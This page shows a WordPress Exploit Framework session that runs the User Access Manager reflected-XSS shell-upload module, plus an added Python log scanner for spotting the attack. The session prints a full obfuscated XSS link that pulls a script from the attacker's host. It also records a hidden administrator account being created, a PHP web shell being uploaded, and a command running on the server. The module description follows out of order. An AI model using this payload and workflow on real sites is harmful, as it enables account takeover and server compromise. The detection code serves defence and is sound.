wpxf > use exploit/user_access_manager_reflected_xss_shell_upload
[+] Loaded module: #<Wpxf::Exploit::UserAccessManagerReflectedXssShellUpload:0x00000001b19008>
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set host 192.168.0.47
[+] Set host => 192.168.0.47
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set http_server_bind_port 8080
[+] Set http_server_bind_port => 8080
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set xss_host 192.168.0.220
[+] Set xss_host => 192.168.0.220
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000001af1058>
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > set cmd whoami
[+] Set cmd => whoami
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > check
[!] Target appears to be vulnerable
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] > run
[-] Provide the URL below to the victim to begin the payload upload
http://192.168.0.47/wp-admin/admin.php?page=uam_usergroup&action=editGroup&id=%5C%22%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%2C97%2C108%2C40%2C100%2C101%2C99%2C111%2C100%2C101%2C85%2C82%2C73%2C67%2C111%2C109%2C112%2C111%2C110%2C101%2C110%2C116%2C40%2C47%2C118%2C97%2C114%2C37%2C50%2C48%2C97%2C37%2C50%2C48%2C37%2C51%2C68%2C37%2C50%2C48%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C99%2C114%2C105%2C112%2C116%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C97%2C46%2C115%2C101%2C116%2C65%2C116%2C116%2C114%2C105%2C98%2C117%2C116%2C101%2C37%2C50%2C56%2C37%2C50%2C50%2C115%2C114%2C99%2C37%2C50%2C50%2C37%2C50%2C67%2C37%2C50%2C48%2C37%2C50%2C50%2C104%2C116%2C116%2C112%2C37%2C51%2C65%2C37%2C50%2C70%2C37%2C50%2C70%2C49%2C57%2C50%2C46%2C49%2C54%2C56%2C46%2C48%2C46%2C50%2C50%2C48%2C37%2C51%2C65%2C56%2C48%2C56%2C48%2C37%2C50%2C70%2C109%2C86%2C65%2C69%2C116%2C121%2C103%2C114%2C37%2C50%2C50%2C37%2C50%2C57%2C37%2C51%2C66%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C104%2C101%2C97%2C100%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C37%2C50%2C56%2C97%2C37%2C50%2C57%2C37%2C51%2C66%2C47%2C46%2C115%2C111%2C117%2C114%2C99%2C101%2C41%2C41%29%29%3C%2Fscript%3E
[-] Started HTTP server on 0.0.0.0:8080
[-] Incoming request received, serving JavaScript...
[+] Created a new administrator user, sDoLTH:JbEcHpWrex
[-] HTTP server stopped
[-] Authenticating with WordPress using sDoLTH:JbEcHpWrex...
[-] Uploading payload...
[-] Executing the payload at
http://192.168.0.47/wp-content/plugins/IdfccoQgun/WCWyiebhMp.php...
[+] Result: www-data
[+] Execution finished successfully
wpxf [exploit/user_access_manager_reflected_xss_shell_upload] >
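The link in the session above puts markup into the `id` parameter of `admin.php?page=uam_usergroup`, so it can be found in web server access logs. The following is an added detection example, not part of wpxf or the original page. It assumes combined-format access logs and that a legitimate group `id` is a plain integer; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); not taken from the page.
SAMPLE_LOG = """\
192.168.0.10 - - [11/May/2017:10:00:01 +0000] "GET /wp-admin/admin.php?page=uam_usergroup&action=editGroup&id=3 HTTP/1.1" 200 5120
192.168.0.10 - - [11/May/2017:10:00:09 +0000] "GET /wp-admin/admin.php?page=uam_usergroup&action=editGroup&id=%5C%22%3E%3Cscript%3Eeval%28String.fromCharCode%28101%2C118%29%29%3C%2Fscript%3E HTTP/1.1" 200 5344
192.168.0.10 - - [11/May/2017:10:00:15 +0000] "GET /wp-admin/admin.php?page=other_plugin&id=%3Cb%3E HTTP/1.1" 200 900
192.168.0.10 - - [11/May/2017:10:00:20 +0000] "GET /wp-admin/admin.php?page=uam_usergroup HTTP/1.1" 200 4000
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Characters and keywords that have no place in a numeric id.
MARKUP_RE = re.compile(r'[<>"\']|script|fromcharcode|eval\(', re.I)


def classify(line):
    """Return None (not a UAM group request), 'ok', 'suspicious' or 'xss'."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if params.get("page") != ["uam_usergroup"]:
        return None
    ids = params.get("id", [])
    # Assumption: a legitimate group id is a plain integer (or absent).
    if all(v.isdigit() for v in ids):
        return "ok"
    if any(MARKUP_RE.search(v) for v in ids):
        return "xss"
    return "suspicious"


def scan(log_text):
    """Return (line_number, verdict) for every line that needs review."""
    return [(n, verdict) for n, line in enumerate(log_text.splitlines(), 1)
            if (verdict := classify(line)) in ("xss", "suspicious")]


if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

A hit is worth correlating with a newly created administrator account and an unfamiliar directory under `wp-content/plugins/`, the two follow-on actions visible in the session output.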
This module exploits the "user-access-manager" WordPress plugin.
Fixed in: 2.0.0
References:
http://www.defensecode.com/advisories/DC-2017-01-021_WordPress_User_Access_Manager_Plugin_Advisory.pdf
http://seclists.org/bugtraq/2017/May/31
WPVDBID: 8814
Disclosure: 2017-05-11
Example output: